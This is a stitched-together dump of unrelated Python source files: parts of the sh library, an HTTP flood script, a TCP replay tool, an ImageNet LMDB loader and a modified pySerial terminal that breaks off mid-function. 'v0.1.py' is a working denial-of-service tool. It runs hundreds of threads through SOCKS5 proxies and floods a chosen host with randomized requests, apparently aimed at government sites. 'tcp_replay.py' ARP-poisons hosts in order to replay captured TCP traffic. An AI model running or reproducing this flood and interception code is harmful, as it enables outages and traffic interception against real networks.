# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
# Copy the Command class and add any baked call kwargs to it
cls_attrs = Command.__dict__.copy()
if baked_args:
call_args, _ = Command._extract_call_args(baked_args)
cls_attrs['_call_args'] = cls_attrs['_call_args'].copy()
cls_attrs['_call_args'].update(call_args)
command_cls = type(Command.__name__, Command.__bases__, cls_attrs)
globs = globals().copy()
globs[Command.__name__] = command_cls
self.__env = Environment(globs, baked_args=baked_args)
def __getattr__(self, name):
return self.__env[name]
def __call__(self, **kwargs):
""" returns a new SelfWrapper object, where all commands spawned from it
have the baked_args kwargs set on them by default """
baked_args = self.__env.baked_args.copy()
baked_args.update(kwargs)
new_mod = self.__class__(self.__self_module, baked_args)
# inspect the line in the parent frame that calls and assigns the new sh
# variable, and get the name of the new variable we're assigning to.
        # this is very brittle and pretty much a sin. but it works 99% of
        # the time, and the tests pass
#
# the reason we need to do this is because we need to remove the old
# cached module from sys.modules. if we don't, it gets re-used, and any
# old baked params get used, which is not what we want
parent = inspect.stack()[1]
try:
code = parent[4][0].strip()
except TypeError:
# On the REPL or from the commandline, we don't get the source code in the
# top stack frame
# Older versions of pypy don't set parent[1] the same way as CPython or newer versions
# of Pypy so we have to special case that too.
if parent[1] in ('<stdin>', '<string>') or (
parent[1] == '<module>' and platform.python_implementation().lower() == 'pypy'):
# This depends on things like Python's calling convention and the layout of stack
# frames but it's a fix for a bug in a very cornery cornercase so....
module_name = parent[0].f_code.co_names[-1]
else:
raise
else:
parsed = ast.parse(code)
try:
module_name = parsed.body[0].targets[0].id
except Exception:
# Diagnose what went wrong
if not isinstance(parsed.body[0], ast.Assign):
raise RuntimeError("A new execution context must be assigned to a variable")
raise
if module_name == __name__:
raise RuntimeError("Cannot use the name '%s' as an execution context" % __name__)
sys.modules.pop(module_name, None)
return new_mod
def in_importlib(frame):
""" helper for checking if a filename is in importlib guts """
return frame.f_code.co_filename == "<frozen importlib._bootstrap>"
def register_importer():
""" registers our fancy importer that can let us import from a module name,
like:
import sh
tmp = sh()
from tmp import ls
"""
def test(importer_cls):
try:
return importer_cls.__class__.__name__ == ModuleImporterFromVariables.__name__
except AttributeError:
# ran into importer which is not a class instance
return False
already_registered = any([True for i in sys.meta_path if test(i)])
if not already_registered:
importer = ModuleImporterFromVariables(restrict_to=[SelfWrapper.__name__], )
sys.meta_path.insert(0, importer)
return not already_registered
def fetch_module_from_frame(name, frame):
mod = frame.f_locals.get(name, frame.f_globals.get(name, None))
return mod
class ModuleImporterFromVariables(object):
""" a fancy importer that allows us to import from a variable that was
recently set in either the local or global scope, like this:
sh2 = sh(_timeout=3)
from sh2 import ls
"""
def __init__(self, restrict_to=None):
self.restrict_to = set(restrict_to or set())
def find_module(self, mod_fullname, path=None):
""" mod_fullname doubles as the name of the VARIABLE holding our new sh
context. for example:
derp = sh()
from derp import ls
here, mod_fullname will be "derp". keep that in mind as we go through
the rest of this function """
parent_frame = inspect.currentframe().f_back
if parent_frame and parent_frame.f_code.co_name == "find_spec":
parent_frame = parent_frame.f_back
while parent_frame and in_importlib(parent_frame):
parent_frame = parent_frame.f_back
# Calling PyImport_ImportModule("some_module"); via the C API may not
# have a parent frame. Early-out to avoid in_importlib() trying to
# get f_code from None when looking for 'some_module'.
# This also happens when using gevent apparently.
if not parent_frame:
return None
# this line is saying "hey, does mod_fullname exist as a name we've
# defined previously?" the purpose of this is to ensure that
# mod_fullname is really a thing we've defined. if we haven't defined
# it before, then we "can't" import from it
module = fetch_module_from_frame(mod_fullname, parent_frame)
if not module:
return None
# make sure it's a class we're allowed to import from
if module.__class__.__name__ not in self.restrict_to:
return None
return self
def find_spec(self, fullname, path=None, target=None):
""" find_module() is deprecated since Python 3.4 in favor of find_spec() """
from importlib.machinery import ModuleSpec
found = self.find_module(fullname, path)
return ModuleSpec(fullname, found) if found is not None else None
def load_module(self, mod_fullname):
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
module = fetch_module_from_frame(mod_fullname, parent_frame)
# we HAVE to include the module in sys.modules, per the import PEP.
# older versions of python were more lenient about this being set, but
# not in >= python3.3, unfortunately. this requirement necessitates the
# ugly code in SelfWrapper.__call__
sys.modules[mod_fullname] = module
module.__loader__ = self
return module
if __name__ == "__main__": # pragma: no cover
# we're being run as a stand-alone script
env = Environment(globals())
run_repl(env)
else:
# we're being imported from somewhere
sys.modules[__name__] = SelfWrapper(sys.modules[__name__])
register_importer()
|
v0.1.py
|
from random_user_agent.user_agent import UserAgent
import threading
import random
import logging
import socket
import socks
import sys
import ssl
logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%H:%m:%S",
level=logging.INFO
)
active_threads = 0
max_threads = 777
usera = UserAgent()
with open("socks5_list.txt", "r") as proxy_list:
    proxies = proxy_list.readlines()
chars = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"
chars_list = chars
context = ssl.create_default_context()
def hflood(host, port, proxy_host, proxy_port, timeout=5, https=False):
try:
global active_threads
active_threads += 1
sock = socks.socksocket()
sock.settimeout(timeout)
sock.set_proxy(socks.SOCKS5, proxy_host, int(proxy_port))
sock.connect((host, port))
if https:
sock = context.wrap_socket(sock, server_hostname=host)
while True:
list_param = random.choices(chars_list, k=77)
params = "".join(list_param)
ua = usera.get_random_user_agent()
http = f"GET /lists/government-websites/?{params} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {ua}\r\n\r\n"
send = sock.send(http.encode())
print(f"Sent {send} bytes of data")
print(sock.recv(100))
except Exception as e:
logging.debug(f"hflood error: {e}")
pass
finally:
active_threads -= 1
host = input("Host: ")
port = int(input("Port: "))
while True:
for proxy in proxies:
proxy = proxy.strip()
proxy_host, proxy_port = proxy.split(":")
while True:
if active_threads >= max_threads:
continue
logging.debug(f"Starting thread with {proxy_host} proxy")
threading.Thread(target=hflood, args=[host, port, proxy_host, proxy_port, 10], daemon=True).start()
break
|
tcp_replay.py
|
from time import time
import threading
from scapy.all import *
from .Client import Client, NetAttrs
from .arp_poison import arp_poison
FIN = 0x01
SYN = 0x02
PSH = 0x08
ACK = 0x10
URG = 0x20
ECE = 0x40
CWR = 0x80
backlog_queue = []
lock = threading.Lock()
running = True
def replay_usage(exit_num=None):
print("Requires: Server/Client IP, PCAP Interface")
def sniffer(client, src, dst):
global backlog_queue, lock, running
passed = int(time() * 1000)
locall = []
while running:
lock.acquire()
t = sniff(iface=client.intface,
count=1,
lfilter=lambda x: x.haslayer(TCP) and x[IP].src == dst.ip and
x[IP].dst == src.ip)[0]
locall.append(t)
curr = int(time() * 1000)
if curr - passed > 1000:  # flush the local buffer roughly once a second
passed = curr
backlog_queue = backlog_queue + locall
locall = []
lock.release()
def rcv_valid(t, rcv):
return t.ip == rcv.ip
def replay(client, src, dst, conversation):
global backlog_queue, lock, running
pos = 0
msg = conversation.pop(0)
while conversation:
if msg[IP].src == src.ip:
sendp(msg, iface=client.intface)
elif msg[IP].src == dst.ip:
lock.acquire()
ok = rcv_valid(backlog_queue.pop(0), msg)
lock.release()  # release before any early return so the lock is never leaked
if not ok:
print('ERROR: unexpected receive at position {}'.format(pos))
running = False
return False
pos += 1
msg = conversation.pop(0) if conversation else []
running = True
return True
# filter pcap for tcp messages from client and server
def pcap_filter(pcap, src, dst):
conversation = []
for packet in pcap:
if packet.haslayer(TCP):
s_to_d = packet[IP].src == src.ip and packet[IP].dst == dst.ip
d_to_s = packet[IP].src == dst.ip and packet[IP].dst == src.ip
if s_to_d or d_to_s:  # keep packets flowing in either direction
conversation.append(packet)
return conversation
def tcp_replay(client, src, dst):
pcap = input('Enter pcap or show to see options: ')
while 'show' == pcap:
print("Pcaps : {}".format(', '.join(client.pcaps.keys())))
pcap = input('Enter pcap or show to see options: ')
client.update(['pcap:', pcap], forced=True)
conversation = pcap_filter(client.pcaps[pcap], src, dst)
arp_poison(client, src, dst)
threading.Thread(target=sniffer, args=(client, src, dst)).start()
if replay(client, src, dst, conversation):
print('Replay successful')
|
imagenet.py
|
from . import lmdb_datasets
from torchvision import datasets, transforms
import os
import os.path as osp
import torch.utils.data
import numpy as np
import cv2
from . import lmdb_data_pb2 as pb2
try:
import Queue  # Python 2
except ImportError:
import queue as Queue  # Python 3
import time
import multiprocessing
DATASET_SIZE = 100
mean = np.array([[[0.485]], [[0.456]], [[0.406]]]) * 255
std = np.array([[[0.229]], [[0.224]], [[0.225]]]) * 255
class Imagenet_LMDB(lmdb_datasets.LMDB):
def __init__(self, imagenet_dir, train=False):
self.train_name = 'imagenet_train_lmdb'
self.val_name = 'imagenet_val_lmdb'
self.train = train
super(Imagenet_LMDB, self).__init__(osp.join(imagenet_dir, self.train_name if train else self.val_name))
txn = self.env.begin()
self.cur = txn.cursor()
self.data = Queue.Queue(DATASET_SIZE * 2)
self.target = Queue.Queue(DATASET_SIZE * 2)
self.point = 0
# self._read_from_lmdb()
def data_transform(self, data, other):
data = data.astype(np.float32)
if self.train:
shape = np.frombuffer(other[0], np.uint16)  # np.fromstring is deprecated
data = data.reshape(shape)
# Random crop
_, w, h = data.shape
x1 = np.random.randint(0, w - 224)
y1 = np.random.randint(0, h - 224)
data = data[:, x1:x1 + 224, y1:y1 + 224]
# HorizontalFlip
# TODO horizontal flip
else:
data = data.reshape([3, 224, 224])
data = (data - mean) / std
tensor = torch.Tensor(data)
del data
return tensor
def target_transform(self, target):
return target
def _read_from_lmdb(self):
self.cur.next()
if not self.cur.key():
self.cur.first()
dataset = pb2.Dataset().FromString(self.cur.value())
for datum in dataset.datums:
data = np.frombuffer(datum.data, np.uint8)
try:
data = self.data_transform(data, datum.other)
except Exception:
print('cannot trans', data.shape)
continue
target = int(datum.target)
target = self.target_transform(target)
self.data.put(data)
self.target.put(target)
# print 'read_from_lmdb', time.time()-r
del dataset
# def read_from_lmdb(self):
# process=multiprocessing.Process(target=self._read_from_lmdb)
# process.start()
def __getitem__(self, index):
if self.data.qsize() < DATASET_SIZE:
self._read_from_lmdb()
data, target = self.data.get(), self.target.get()
return data, target
def __len__(self):
return self.env.stat()['entries'] * DATASET_SIZE
def Imagenet_LMDB_generate(imagenet_dir, output_dir, make_val=False, make_train=False):
# the imagenet_dir should have direction named 'train' or 'val',with 1000 folders of raw jpeg photos
train_name = 'imagenet_train_lmdb'
val_name = 'imagenet_val_lmdb'
def target_trans(target):
return target
if make_val:
val_lmdb = lmdb_datasets.LMDB_generator(osp.join(output_dir, val_name))
def trans_val_data(dir):
tensor = transforms.Compose([
transforms.Resize(256),  # Scale was renamed Resize in torchvision
transforms.CenterCrop(224),
transforms.ToTensor()
])(dir)
tensor = (tensor.numpy() * 255).astype(np.uint8)
return tensor
val = datasets.ImageFolder(osp.join(imagenet_dir, 'val'), trans_val_data, target_trans)
val_lmdb.write_classification_lmdb(val, num_per_dataset=DATASET_SIZE)
if make_train:
train_lmdb = lmdb_datasets.LMDB_generator(osp.join(output_dir, train_name))
def trans_train_data(dir):
tensor = transforms.Compose([
transforms.Resize(256),  # Scale was renamed Resize in torchvision
transforms.ToTensor()
])(dir)
tensor = (tensor.numpy() * 255).astype(np.uint8)
return tensor
train = datasets.ImageFolder(osp.join(imagenet_dir, 'train'), trans_train_data, target_trans)
train.imgs = np.random.permutation(train.imgs)
train_lmdb.write_classification_lmdb(train, num_per_dataset=DATASET_SIZE, write_shape=True)
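# --- usage sketch (editor's addition, illustrative only; paths are hypothetical) ---
# Generate the validation LMDB once, then read it like a torch dataset:
#
#   Imagenet_LMDB_generate('/data/imagenet', '/data/lmdb', make_val=True)
#   val_set = Imagenet_LMDB('/data/lmdb', train=False)
#   data, target = val_set[0]   # 3x224x224 float tensor, int class label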
|
miniterm.py
|
#!/usr/bin/env python
# Edited by Pedro Sidra <pedrosidra0@gmail.com> for use in personal project
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2020 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input  # Python 3: input() already returns "raw" text
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
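# example (editor's addition): control characters map to their Ctrl names,
# e.g. key_description('\x14') == 'Ctrl+T', while key_description('q') == "'q'"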
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
if text == "\b":
text = "\b \b"  # overwrite the previous character on a backspace
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
import platform
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
fncodes = {
';': '\x1bOP', # F1
'<': '\x1bOQ', # F2
'=': '\x1bOR', # F3
'>': '\x1bOS', # F4
'?': '\x1b[15~', # F5
'@': '\x1b[17~', # F6
'A': '\x1b[18~', # F7
'B': '\x1b[19~', # F8
'C': '\x1b[20~', # F9
'D': '\x1b[21~', # F10
}
navcodes = {
'H': '\x1b[A', # UP
'P': '\x1b[B', # DOWN
'K': '\x1b[D', # LEFT
'M': '\x1b[C', # RIGHT
'G': '\x1b[H', # HOME
'O': '\x1b[F', # END
'R': '\x1b[2~', # INSERT
'S': '\x1b[3~', # DELETE
'I': '\x1b[5~', # PGUP
'Q': '\x1b[6~', # PGDN
}
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
# ANSI handling available through SetConsoleMode since Windows 10 v1511
# https://en.wikipedia.org/wiki/ANSI_escape_code#cite_note-win10th2-1
if platform.release() == '10' and int(platform.version().split('.')[2]) > 10586:
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004
import ctypes.wintypes as wintypes
if not hasattr(wintypes, 'LPDWORD'): # PY2
wintypes.LPDWORD = ctypes.POINTER(wintypes.DWORD)
SetConsoleMode = ctypes.windll.kernel32.SetConsoleMode
GetConsoleMode = ctypes.windll.kernel32.GetConsoleMode
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
mode = wintypes.DWORD()
GetConsoleMode(GetStdHandle(-11), ctypes.byref(mode))
if (mode.value & ENABLE_VIRTUAL_TERMINAL_PROCESSING) == 0:
SetConsoleMode(GetStdHandle(-11), mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
self._saved_cm = mode
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
try:
ctypes.windll.kernel32.SetConsoleMode(ctypes.windll.kernel32.GetStdHandle(-11), self._saved_cm)
except AttributeError: # in case no _saved_cm
pass
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0xe0)):  # prefix byte of a function/nav key
try:
code = msvcrt.getwch()
if z == unichr(0):
return self.fncodes[code]
else:
return self.navcodes[code]
except KeyError:
pass
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{!r}] '.format(text))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{!r}] '.format(text))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
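# --- chaining sketch (editor's addition, illustrative only) ---
# Miniterm.update_transformations() builds one pipeline per direction from
# these tables, e.g. with eol='crlf' and filters=['default']:
#
#   tx_transformations = [CRLF(), NoTerminal()]   # applied in order
#   rx_transformations = list(reversed(tx_transformations))
#
#   CRLF().tx('\n')          # -> '\r\n'
#   NoTerminal().rx('\x07')  # -> '\u2407' (control-picture BEL)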
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = unichr(0x1d) # GS/CTRL+]
self.menu_character = unichr(0x14) # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
line=""
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
if ord(c) == 8:  # backspace: drop the last buffered character
line = line[:-1]
elif ord(c) == 10:  # enter: flush the buffered line to the port
line = line + "\r\n"
for t in line:
self.serial.write(self.tx_encoder.encode(t))
line = ""
else:
line += text
# continue
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'zZ': # Z -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
elif c in 'qQ':
self.stop() # Q -> exit app
else:
sys.stderr.write('--- unknown menu character {} ---\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
